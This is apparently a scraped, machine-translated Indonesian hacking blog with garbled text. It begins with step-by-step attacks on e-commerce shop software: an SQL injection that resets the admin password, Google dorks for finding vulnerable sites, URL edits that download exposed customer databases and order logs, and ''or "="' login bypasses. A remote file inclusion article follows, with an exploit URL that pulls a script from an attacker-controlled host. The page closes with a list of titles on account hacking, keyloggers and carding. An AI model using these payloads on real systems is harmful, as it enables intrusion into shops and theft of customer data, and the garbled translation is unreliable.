Keyword = & category = 5); update tbluser set fldpassword =''where
fldusername = 'admin' - & SubCategory = All & action.x = 33 & action.y = 6

Login to admin, in http://xxxxxxx/vpasp/shopadmin.asp

11. example in the form of bugs shop system: Lobby.asp
example shop will appear on search engines when some mengetikan
keyword, such as:
google.com Type -> allinurl: Lobby.asp
Example: www.xxxxx.com / mall / lobby.asp
Remove any posts mall / lobby.asp and replace with -> fpdb / shop.mdb
The result: www.xxxxx.com / fpdb / shop.mdb

12. example in the form of bugs shop system: Shopper.cgi
example shop will appear on search engines when some mengetikan
keyword, such as:
google: Type -> allinurl: / cgi-local/shopper.cgi
Example: www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key =
Add the -> & template = ... order.log
The result: www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=...&template ...

13. example in the form of bugs shop system: Proddetail.asp
example shop will appear on search engines when some mengetikan
keyword, such as:
Type -> allinurl: proddetail.asp? Prod =
Example: www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Remove any posts proddtail.asp? Prod = SG369 and replace with -> fpdb /
vsproducts.mdb
The result: www.xxxxxx.org / fpdb / vsproducts.mdb

14. example in the form of bugs shop system: Digishop
example shop will appear on search engines when some mengetikan
keyword, such as:
Type in google -> inurl: "/ cart.php? m ="
Example: http://xxxxxxx.com/store/cart.php?m=view.
Remove any posts cart.php? M = view and replace with -> admin
The result http://xxxxxx.com/store/admin
You go the same username pass it on statment SQL injection

Usename: 'or "="
Password: 'or "="

.:: Note !::..
I DONT TAKE ANY responsible for ANYTING ... U TAKE UR OWN RISK ..!!!

Identify Type of Hacker Attacks

2009-07-22T01:27:00.000-07:00

In the world of hacking (cracking precisely ding?) Recognized several types of attacks against
server. The following types of basic attacks that can be grouped in at least 6
classes, namely:

Intrusion
---------
This type of attack on a cracker (hacker level generally is) will be
using the computer system server. The attack is more focused on the full access granted
and does not aim to destroy. This type of attack is
also applied to you by the hacker to
test their network security systems. Done in several stages and is not in
scheme on each specific job serangannya (described in another article).
Hacking is an Art? =)

Denial of Services (DoS)
------------------------
On the type of DoS attack caused the server service stuck because of flooded
request engine attacker. In the example the case of Distributed Denial of Services (DDoS)
for example, using the zombie machines, the attacker will do packeting
request on the server simultaneously and simultaneous asymmetric so that the buffer server akan
a loss to answer them? Stuck / hung akan override server. So, not the server name again?
(servicenya dead ripe spelled server? hehehe ....)

Joyrider
--------
Nah, the name of this fraudulent? Because the most read novels of hacking and I can
learn correct, isenglah happens nyoba-nyoba a nyerang sciences IM super fast
(the term 'masturbation' dimesin people). Or why not with a machine the contents? =).
Clear that this type of attack average because I want to taste, but there is also the
cause damage or loss of data.

Vandal
------
Type of attack pengrusak specialist? nothing else to explain champion? =)

Scorekeeper
-----------
Attacks that aim to reach a reputation of cracking most. Usually only
shaped deface web pages (index / nambah page) and with memampangakan NickName
certain groups. Most still do not care with the contents of the target machine =).
When this type of attacker is more known as Wannabe / script kiddies.

Spy
---
Three hurup only. Type of attack to obtain confidential information or data from machines
target. Usually attack the machine with the database inside the application. Sometimes
anchor company to rent a 'detective' to steal corporate data rivalnya? How
try Pak? =)

So little about the first type of attack on the target machine is most certainly
Hopefully a good reference although it is less feasible. Revilement can
addressed to me personally?

PHP INJECTION

2009-07-22T00:51:00.000-07:00

° FOREWORD
---

Remote file inclusion can be defined as inserting a file from an external file in a webserver with the goal of the script will be executed when the file is loaded in disisipi. This technique requires that the webserver is able to run the server side scripting (PHP, ASP, etc) and disisipi file that is created using the script language. Target remote file inclusion usually shaped a portal or content management system (CMS) so that many number of websites vulnerable to this type of attack.

In this article we will be discussing how the file inclusion (which we call the term 'injection') can occur in the PHP language.

° HOW CAN Happen?
--------

A file inclusion attacks occur based on the error or inadvertence pendeklarasian variables in a file. A variable that is not declared or defined correctly can be exploited. Terms of the occurrence of injection itself consists of:

1. Variables that are not declared correctly (unsanitized variables)

Variables in PHP have the syntax:

# 1 include ($ namavariable ". / File ...")
# 2 require_once ($ namavariable. / File ...)
# 3 include_once ($ variable. / File ...)

For example we have a file called jscript.php and there are variables like this:

...
include ($ my_ms [ "root "].'/ error.php ');
...

These variables have the possibility to file disisipi from outside eksploit webserver with PHP script injection:

http://www.target.com/ [Script Path] / jscript.php? my_ms [root] = http://www.injek-pake-kaki.com/script?

Above is an example of exploitation MySpeach <= v3.0.2 (my_ms [root])

2. Settings in php.ini file

# 1. register_globals = On
# 2. magic_quotes = off
# 3. allow_fopenurl = on

° BERBAHAYAKAH?
-------------

File inclusion has a high risk level (High Risk) is very dangerous and even level (Very Dangerous) because the injection permit perpetrators to perform remote command execution (Remote Commands Execution) of the server. This is very dangerous for a server if the perpetrators attempt to gain access to the higher ways to exploit local, so that it can only get access to the administrator or root.

In general the risk of attacks is:

1. Web root folder / subdirectory defacing.
2. Previledge escalation (to get access higher).
3. Running in the process server (psyBNC, bots, etc.)
4. Pilfering aka theft data (information such as credentials, credit cards, etc. ..)
5. And more ...!!! Action including takeovers and server ddos!

° SYSTEM OPERATION immune WHAT?
------------------------------

I remember playing C & C Generals (my fave game!) When a hacker out of the barracks. They say "NO SYSTEMS IS SAFE!". Precisely! There is no operating system safe from injection attacks as long as they use a server side scripting that can be exploited, no matter whether it is Microsoft Windows, Linux, FreeBSD, Solaris, Darwin OS, and others.

° What should be done?
-------------------------

Many portals and communities who are often white hat releases about the latest bugs injection. Most secure way is to always consider the development of which they do so you can make a few improvements to the CMS, which means that now you may use. Always look at the raw logs are usually located on your hosting service. If there is a rather fetching as deviant GET / index.php? Page = http://www.injek-pake-kaki.net/cmd? you must suspicious, because this can only attack against the web portal, or that you manage.

One of the most secure technique for an administrator is to always consider the efforts infiltration and exploitation of local business. Use a firewall to prevent the infiltration of those who are not responsible for and attention to port-server port that is open.

° Ending
------

I write this article based on what I know, and if there is a mistake because my ignorance you can contact me via email. Experience is the best teacher for us all. All can happen because there is no time made perfect. Nobody is perfect! No systems is safe!

° REFERENCES
---------

- Http://net-square.com/papers/one_way/one_way.html (Very simple haxing guides)
- Www.milw0rm.com (Nice place to looking for exploits and buggy things)
- Http://www.packetstormsecurity.org (Great advisory, toolz, exploits and archives)
- Www.google.com (Greatest place to ask!)
- Http://www.ultrapasswords.com/ (Place cooling down to ... We love streaming vids! Yeah!)

Hacking

The best scanner SQL injection

(Deep UnFreezer)

1001 HOW TO GET RIGHT / ADMINISTRATOR PASSWORD

THIS IS THE APPLICATION FOR FACEBOOK ACCOUNT freeze OTHERS

Deepfreeze v 6.xx How to collapse in a computer cafe (preparation hack facebook password)

How To Get Tens of Thousands Email

Knowing Tips email accounts and passwords stored in Firefox browser

Password breaker software v6 100% working Deepfreeze

Looking at the Computer Serial Number?

Passive Footprinting

Passive footprinting is the initial information gathering process does not involve the victim but the victim directly. What are the benefits that can hackers get through passive footprinting?In Passive footprinting hackers can obtain information about the victims, namely:

Wordpress Hack – How to Get Simple Tags Plugin Working with Wordpress 2.9!

How to Ping Your Website Worldwide!

Check Your Website For DNS Delegation!

Tips to Avoid Hacking Blog

Tips Hacking Facebook with Keylogger ?

Knowing Tips email accounts and passwords stored in Firefox browser

Learning Becoming Hacker

Reading Results:

How to Block Unwanted Emails

How to Trace Any IP Address

Domain Hijacking – How to Hijack a Domain

How to Hack a Yahoo Password

Hack Paypal

Winlock-unlock-hack

LAN Attacker 2009 V3.5

How to Get Password Hackers

how-to-hack-passwords-using-usb

8 Hidden Firefox Secrets Revealed

Hack a server using PHP Bugs Injection.

Other ways Hack Paypal, Facebook, Etc.

Tips to Avoid Hacking WordPress Blog Engine

Tips Dismantling Hidden Password

8 Easy Firefox Tweaks for Super Fast Web Browsing

Bing Tips & Tricks

Know Attacks Man-in-the-Middle (MITM)

Understanding Denial of Service Attack

Making ID Boot (Bot) Yahoo Messenger

Cracking or ID or username Hacking Yahoo Messenger (Including Email): Just Introduction and how to overcome

Protect Your Blog From Plagiarize (Copy Paste)

How to hide "Navbar Blogger"

Port Scanning

How To Send Anonymous Emails

A Virus Program to Block Websites

What are the Effects of Computer Hacking

Instant Hacking

Recover the Password using DreamPackPL

SQL in a Nutshell, Third Edition

Oracle DBA Pocket Guide

Oracle PL/SQL for DBAs

Simply SQL

Backup & Recovery

Password Hacking: Programs and Tools Make it Easy

Chat With Command Prompt

Learn how HACKING

Study Hack Yuck! (3) - Hack Windows XP SP2

Collection 63 Keylogger Options

Recognize The Man-In-The-Middle (MITM)

Disclaimer

Engineering carding

Identify Type of Hacker Attacks

PHP INJECTION

Passive footprinting is the initial information gathering process does not involve the victim but the victim directly. What are the benefits that can hackers get through passive footprinting?
In Passive footprinting hackers can obtain information about the victims, namely: